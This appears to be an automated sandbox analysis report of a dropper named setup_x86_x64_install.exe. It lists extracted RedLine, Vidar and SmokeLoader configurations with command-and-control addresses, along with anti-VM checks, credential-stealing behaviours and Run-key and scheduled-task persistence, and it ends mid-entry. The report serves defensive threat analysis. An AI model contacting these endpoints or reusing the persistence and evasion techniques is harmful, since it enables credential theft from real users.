Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
1813s -
max time network
1813s -
platform
windows10_x64 -
resource
win10-de -
submitted
12-09-2021 07:11
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
3.5MB
-
MD5
1b5154bc65145adba0a58e964265d5f2
-
SHA1
5a96fd55be61222b3e6438712979dc2a18a50b8c
-
SHA256
c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19
-
SHA512
9465da97b0986fef660e3f7725b4d4c034bef677acbe36382d95a8052c54634f004162aa3f105156e503af1b26632e47e44234ef9825b388260a6bcd310a5026
Malware Config
Extracted
redline
pab123
45.14.49.169:22411
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
Modifies system executable filetype association 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe -
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 508 4040 rundll32.exe 22 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 968 4040 rundll32.exe 22 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8048 4040 rundll32.exe 22 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral10/memory/1848-215-0x00000000048A0000-0x00000000048BF000-memory.dmp family_redline behavioral10/memory/1848-220-0x0000000004A30000-0x0000000004A4E000-memory.dmp family_redline behavioral10/memory/5792-454-0x000000000041C5EE-mapping.dmp family_redline -
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral10/files/0x000600000001ab48-164.dat family_socelars behavioral10/files/0x000600000001ab48-150.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 2748 created 1868 2748 WerFault.exe 108 PID 2972 created 4452 2972 WerFault.exe 95 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 7124 created 8132 7124 svchost.exe 413 -
resource yara_rule behavioral10/memory/5208-457-0x00000000053D0000-0x00000000058CE000-memory.dmp redline -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral10/memory/4420-212-0x00000000034B0000-0x0000000003581000-memory.dmp family_vidar behavioral10/memory/4420-242-0x0000000000400000-0x00000000017F2000-memory.dmp family_vidar -
resource yara_rule behavioral10/files/0x000400000001ab2b-124.dat aspack_v212_v242 behavioral10/files/0x000400000001ab2b-125.dat aspack_v212_v242 behavioral10/files/0x000400000001ab2c-123.dat aspack_v212_v242 behavioral10/files/0x000400000001ab2c-128.dat aspack_v212_v242 behavioral10/files/0x000400000001ab2e-129.dat aspack_v212_v242 behavioral10/files/0x000400000001ab2e-130.dat aspack_v212_v242 -
Blocklisted process makes network request 51 IoCs
flow pid Process 207 7152 MsiExec.exe 212 7152 MsiExec.exe 215 7152 MsiExec.exe 217 7152 MsiExec.exe 219 7152 MsiExec.exe 221 7152 MsiExec.exe 222 7152 MsiExec.exe 223 7152 MsiExec.exe 224 7152 MsiExec.exe 226 7152 MsiExec.exe 227 7152 MsiExec.exe 228 7152 MsiExec.exe 229 7152 MsiExec.exe 230 7152 MsiExec.exe 231 7152 MsiExec.exe 232 7152 MsiExec.exe 233 7152 MsiExec.exe 235 7152 MsiExec.exe 237 7152 MsiExec.exe 238 7152 MsiExec.exe 240 7152 MsiExec.exe 241 7152 MsiExec.exe 243 7152 MsiExec.exe 244 7152 MsiExec.exe 245 7152 MsiExec.exe 250 7152 MsiExec.exe 251 7152 MsiExec.exe 58 1036 schtasks.exe 252 7152 MsiExec.exe 253 7152 MsiExec.exe 254 7152 MsiExec.exe 255 7152 MsiExec.exe 256 7152 MsiExec.exe 257 7152 MsiExec.exe 258 7152 MsiExec.exe 259 7152 MsiExec.exe 261 7152 MsiExec.exe 262 7152 MsiExec.exe 264 7152 MsiExec.exe 265 7152 MsiExec.exe 266 7152 MsiExec.exe 267 7152 MsiExec.exe 268 7152 MsiExec.exe 269 7152 MsiExec.exe 270 7152 MsiExec.exe 273 7152 MsiExec.exe 274 7152 MsiExec.exe 275 7152 MsiExec.exe 276 7152 MsiExec.exe 78 1456 schtasks.exe 355 4332 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe -
Executes dropped EXE 64 IoCs
pid Process 4920 setup_installer.exe 5016 setup_install.exe 3560 Sun05640630a6aa.exe 4236 Sun050462125c7d35.exe 740 Sun05d60bc3b96248e5.exe 3288 Sun05899db881f67fb29.exe 1848 Sun052bbd8bebd9.exe 2216 Sun05532f7abc.exe 4420 Sun05ac1b0207d3ff3b8.exe 1788 WerFault.exe 4452 Sun05fa3b4d2ae56e.exe 4404 Sun054fe19a12cb3.exe 3872 Sun054fe19a12cb3.tmp 4804 LzmwAqmV.exe 5084 4402665.exe 5088 Chrome 5.exe 684 1860007.exe 972 46807GHF____.exe 1352 PublicDwlBrowser1100.exe 3548 2.exe 1868 setup.exe 2108 udptest.exe 4488 Conhost.exe 4444 WinHoster.exe 5000 3002.exe 2896 setup_2.tmp 4292 jhuuee.exe 4436 BearVpn 3.exe 1456 133519.exe 1536 setup_2.exe 4536 3002.exe 2648 setup_2.tmp 1036 3733924.exe 3436 3307456.exe 3728 2967757.exe 5208 6937945.exe 5572 1949358.exe 5648 2880988.exe 5792 6937945.exe 4728 Conhost.exe 3684 ultramediaburner.exe 5476 ultramediaburner.tmp 5936 Rulidakupy.exe 5268 UltraMediaBurner.exe 4440 Fokifyfulo.exe 3688 services64.exe 6220 GcleanerEU.exe 6444 installer.exe 6780 anyname.exe 6852 BsInstFile.exe 7112 askinstall52.exe 4172 reg.exe 3872 5077757.exe 6328 8057540.exe 6932 3098340.exe 2128 4990988.exe 7040 install.exe 6720 SimplInst.exe 7216 SimplInst.exe 7424 gcleaner.exe 7452 C3KHKEn~m73GVLA.exE 7524 sihost64.exe 4224 48C2.exe 6164 57D6.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 133519.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8057540.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3098340.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3098340.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B98.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 133519.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8057540.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SimplInst.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B98.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation Rulidakupy.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation UbmPrUN.exe -
Loads dropped DLL 52 IoCs
pid Process 5016 setup_install.exe 5016 setup_install.exe 5016 setup_install.exe 5016 setup_install.exe 5016 setup_install.exe 3872 5077757.exe 2896 setup_2.tmp 2648 setup_2.tmp 4700 Conhost.exe 5228 rundll32.exe 4028 rundll32.exe 4420 Sun05ac1b0207d3ff3b8.exe 4420 Sun05ac1b0207d3ff3b8.exe 6444 installer.exe 6444 installer.exe 6444 installer.exe 6268 MsiExec.exe 6268 MsiExec.exe 8060 rundll32.exe 8176 rundll32.exe 7152 MsiExec.exe 7152 MsiExec.exe 7152 MsiExec.exe 7152 MsiExec.exe 7152 MsiExec.exe 7152 MsiExec.exe 7152 MsiExec.exe 7152 MsiExec.exe 7152 MsiExec.exe 7152 MsiExec.exe 6444 installer.exe 7152 MsiExec.exe 7152 MsiExec.exe 8048 MsiExec.exe 8048 MsiExec.exe 8048 MsiExec.exe 8048 MsiExec.exe 8048 MsiExec.exe 8048 MsiExec.exe 8048 MsiExec.exe 7152 MsiExec.exe 7868 CF78.exe 7868 CF78.exe 7868 CF78.exe 7868 CF78.exe 7868 CF78.exe 4332 rundll32.exe 3456 FileSyncConfig.exe 3456 FileSyncConfig.exe 3456 FileSyncConfig.exe 3456 FileSyncConfig.exe 3456 FileSyncConfig.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1860007.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\Caelacedunae.exe\"" 46807GHF____.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" OneDriveSetup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 133519.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8057540.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3098340.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B98.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini UbmPrUN.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\Q: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com 89 ip-api.com -
Drops file in System32 directory 58 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 09A04C3522BE8FAF svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat UbmPrUN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 UbmPrUN.exe File created C:\Windows\system32\GroupPolicy\gpt.ini SimplInst.exe File opened for modification C:\Windows\System32\Tasks\bCQQUSYoXLKlZTQVFm svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE UbmPrUN.exe File opened for modification C:\Windows\System32\Tasks\gBAQvvrnh svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 UbmPrUN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData UbmPrUN.exe File opened for modification C:\Windows\System32\Tasks\MpGuFfBVdJflLk svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\ZoXPCQOixILhL2 svchost.exe File opened for modification C:\Windows\System32\Tasks\TSZDlHjZcujaNcgsj2 svchost.exe File opened for modification C:\Windows\System32\Tasks\JWccChrZepOVqMLId svchost.exe File opened for modification C:\Windows\System32\Tasks\hxUIoduwsSkQKnehv svchost.exe File opened for modification C:\Windows\System32\Tasks\TXAwOSJqerYTzUX svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2543B5AF7D46D42E6CEED21F85143F6A_DD661F9918408D0BD7983B98C8E1792C UbmPrUN.exe File opened for modification C:\Windows\System32\Tasks\spuyhAIOUfZM svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content UbmPrUN.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 UbmPrUN.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies UbmPrUN.exe File opened for modification C:\Windows\System32\Tasks\NrvtNKuORviNiFRYXGZ2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft UbmPrUN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache UbmPrUN.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90} svchost.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini KXOTaKB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 UbmPrUN.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2543B5AF7D46D42E6CEED21F85143F6A_DD661F9918408D0BD7983B98C8E1792C UbmPrUN.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\gBumTvfjY svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 UbmPrUN.exe File opened for modification C:\Windows\System32\Tasks\TXAwOSJqerYTzUX2 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol KXOTaKB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 UbmPrUN.exe File opened for modification C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1456 133519.exe 6328 8057540.exe 6932 3098340.exe 8008 B98.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2684 set thread context of 4576 2684 svchost.exe 133 PID 5208 set thread context of 5792 5208 6937945.exe 147 PID 3688 set thread context of 8128 3688 services64.exe 277 -
Drops file in Program Files directory 32 IoCs
description ioc Process File created C:\Program Files (x86)\AfNWPhScxyylC\iSLzFjn.dll UbmPrUN.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-C5QEH.tmp ultramediaburner.tmp File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UbmPrUN.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja UbmPrUN.exe File created C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR\yEHMdln.xml UbmPrUN.exe File created C:\Program Files (x86)\UltraMediaBurner\is-PHMC1.tmp ultramediaburner.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi UbmPrUN.exe File created C:\Program Files (x86)\CaOqiYMiQPmU2\owlTstnnqclsP.dll UbmPrUN.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File created C:\Program Files (x86)\CaOqiYMiQPmU2\CYTqTeQ.xml UbmPrUN.exe File created C:\Program Files (x86)\FarLabUninstaller\is-GDUUI.tmp setup_2.tmp File created C:\Program Files (x86)\Common Files\Caelacedunae.exe 46807GHF____.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File created C:\Program Files\Windows Photo Viewer\JTSSYWMJLN\ultramediaburner.exe 46807GHF____.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File created C:\Program Files (x86)\YSFbCTIaU\wTtncs.dll UbmPrUN.exe File created C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi UbmPrUN.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UbmPrUN.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\Common Files\Caelacedunae.exe.config 46807GHF____.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File created C:\Program Files (x86)\AfNWPhScxyylC\uhXvvFg.xml UbmPrUN.exe File created C:\Program Files (x86)\HpvPjMDmaiUn\yixiKzR.dll UbmPrUN.exe File created C:\Program Files\Windows Photo Viewer\JTSSYWMJLN\ultramediaburner.exe.config 46807GHF____.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\YSFbCTIaU\EcEMsvt.xml UbmPrUN.exe File created C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR\ImouUmS.dll UbmPrUN.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp -
Drops file in Windows directory 55 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI1DF9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4661.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Tasks\hxUIoduwsSkQKnehv.job schtasks.exe File created C:\Windows\Installer\f751c85.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI4BB3.tmp msiexec.exe File opened for modification C:\Windows\Tasks\TXAwOSJqerYTzUX.job svchost.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI36F7.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\Tasks\bCQQUSYoXLKlZTQVFm.job schtasks.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI4257.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI5490.tmp msiexec.exe File created C:\Windows\Installer\f751c82.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI1F72.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1FC2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4CED.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI35ED.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI44AA.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI3785.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI39DA.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\f751c82.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI2020.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Tasks\bCQQUSYoXLKlZTQVFm.job svchost.exe File opened for modification C:\Windows\Tasks\hxUIoduwsSkQKnehv.job svchost.exe File opened for modification C:\Windows\Installer\MSI2060.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI389F.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI1F32.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI39B9.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri Explorer.EXE File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification 